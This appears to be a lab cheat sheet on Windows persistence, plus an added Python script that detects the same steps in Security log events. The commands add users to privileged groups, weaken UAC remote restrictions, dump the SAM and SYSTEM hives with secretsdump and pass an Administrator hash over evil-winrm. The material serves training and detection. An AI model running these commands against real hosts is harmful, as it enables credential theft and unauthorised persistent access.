☣️Persistence
$ net localgroup administrators thmuser0 /add
$ net localgroup "backup operators" thmuser0 /add
$ net localgroup "Remote Management Users" thmuser1 /add
$ reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
... to add a local user to the local Administrators group (or Backup Operators), grant remote logon through the Remote Management Users group, and set LocalAccountTokenFilterPolicy so UAC remote restrictions no longer filter the local account's token
$ evil-winrm -i 10.10.116.75 -u thmuser1 -p Password321 ... to connect via WinRM
$ reg save hklm\system system.bak
$ reg save hklm\sam sam.bak
$ download system.bak
$ download sam.bak
... to save the SYSTEM and SAM hives and pull them down over the Evil-WinRM session
$ impacket-secretsdump -sam sam.bak -system system.bak LOCAL ... to dump the local hashes from the saved hives
$ evil-winrm -i 10.10.116.75 -u Administrator -H f3118544a831e728781d780cfdb9c1fa ... to pass the hash with Evil-WinRM
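The steps above leave a clear trail in the Windows Security log: each `net localgroup ... /add` produces event 4732 (member added to a security-enabled local group) naming the group and the member, and the `reg add` on `LocalAccountTokenFilterPolicy` produces event 4657 (registry value modified) when object-access auditing is enabled on that key. The following script, an added detection example that is not part of these notes, scans a handful of constructed event records for exactly these two artifacts. The dict field names (`EventID`, `SubjectUserName`, `TargetUserName`, `MemberName`, `ObjectValueName`, `NewValue`) mirror the Security-log XML fields in simplified form and are an assumption about how the records were exported; the sample events are constructed, not real log data.

```python
"""Flag the local-group additions and the LocalAccountTokenFilterPolicy
change described above in Windows Security log events.

Added example, not part of the original notes.  Field names are a
simplified (assumed) mapping of the Security-log XML fields; SAMPLE_EVENTS
are constructed records, not real log data.
"""
import re

# Groups whose membership changes indicate the persistence pattern above.
WATCHED_GROUPS = {"administrators", "backup operators", "remote management users"}
# Registry value whose change to 1 removes UAC remote restrictions.
WATCHED_VALUE = re.compile(r"localaccounttokenfilterpolicy", re.IGNORECASE)

# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4732, "SubjectUserName": "attacker", "TargetUserName": "Administrators",
     "MemberName": "thmuser0"},
    {"EventID": 4732, "SubjectUserName": "attacker", "TargetUserName": "Backup Operators",
     "MemberName": "thmuser0"},
    {"EventID": 4732, "SubjectUserName": "attacker", "TargetUserName": "Remote Management Users",
     "MemberName": "thmuser1"},
    # Benign: a group not in the watch list.
    {"EventID": 4732, "SubjectUserName": "helpdesk", "TargetUserName": "Print Operators",
     "MemberName": "bob"},
    {"EventID": 4657, "SubjectUserName": "attacker",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",
     "ObjectValueName": "LocalAccountTokenFilterPolicy", "NewValue": "1"},
    # Benign: an unrelated registry value.
    {"EventID": 4657, "SubjectUserName": "svc",
     "ObjectName": r"\REGISTRY\MACHINE\SOFTWARE\Example", "ObjectValueName": "Setting",
     "NewValue": "2"},
    # Unrelated event type (network logon) that the scanner ignores.
    {"EventID": 4624, "SubjectUserName": "thmuser1", "LogonType": 3},
]


def classify(event):
    """Return an alert string for a suspicious event, or None if it is not of interest."""
    eid = event.get("EventID")
    if eid == 4732:  # A member was added to a security-enabled local group.
        group = event.get("TargetUserName", "")
        if group.lower() in WATCHED_GROUPS:
            return (f"group-add: {event.get('MemberName')} -> {group} "
                    f"by {event.get('SubjectUserName')}")
    elif eid == 4657:  # A registry value was modified (requires a SACL on the key).
        value_name = event.get("ObjectValueName", "")
        if WATCHED_VALUE.fullmatch(value_name) and str(event.get("NewValue")) == "1":
            return (f"uac-remote-restrictions-disabled: {event.get('ObjectName')} "
                    f"by {event.get('SubjectUserName')}")
    return None


def scan(events):
    """Run classify over a sequence of events and return the non-empty alerts in order."""
    return [alert for alert in (classify(e) for e in events) if alert]


if __name__ == "__main__":
    for line in scan(SAMPLE_EVENTS):
        print(line)
```

On a real host the same logic applies to records exported from the Security log (for example with `wevtutil` or a SIEM forwarder); the 4657 check only fires if auditing is configured on the `Policies\System` key, so a baseline comparison of the value itself is a useful complement.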